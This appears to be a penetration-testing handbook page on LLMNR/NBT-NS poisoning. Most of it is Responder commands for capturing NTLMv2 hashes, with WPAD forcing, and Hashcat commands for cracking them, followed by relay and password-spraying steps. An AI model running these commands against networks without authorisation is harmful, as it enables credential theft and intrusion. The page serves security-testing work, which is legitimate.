Handbook

LLMNR Poisoning

Updated 29 Sept 2026Services✎ Suggest a change
On this page

LLMNR/NBT-NS Poisoning

Attack Flow

plain text
DNS query fails → LLMNR/NBT-NS multicast fallback → Responder replies "I am that host"
→ Victim authenticates via NTLM → NTLMv2 hash captured
→ Crack offline (Hashcat) OR relay (ntlmrelayx)

Tool: Responder

Execution

bash
# Standard
sudo responder -I eth0 -dw
sudo responder -I eth0 -dwv

# Tee output
sudo responder -I eth0 -dwv 2>&1 | tee responder_output.txt

# Forced NTLM via WPAD (no victim typo needed)
sudo responder -I eth0 -dwPv
sudo responder -I eth0 -dwPv 2>&1 | tee responder_output.txt

# Over VPN
sudo responder -I tun0 -dwPv
sudo responder -I tun0 -dwPv 2>&1 | tee responder_output.txt
FlagPurpose
-IInterface
-dDHCP poisoning
-wRogue WPAD proxy
-PForce NTLM auth (requires -w)
-vVerbose

View captured hashes:

bash
cd /usr/share/responder/logs
ls
cat *txt

Cracking (Hashcat - Mode 5600)

bash
hashcat -m 5600 captured_hash.txt /usr/share/wordlists/rockyou.txt
hashcat -m 5600 captured_hash.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule
hashcat -m 5600 captured_hash.txt --show

Next Steps

ResultAction
Hash capturedCrack offline (Hashcat) or relay (ntlmrelayx)
Hash crackedSpray against SMB, RDP, WinRM, VPN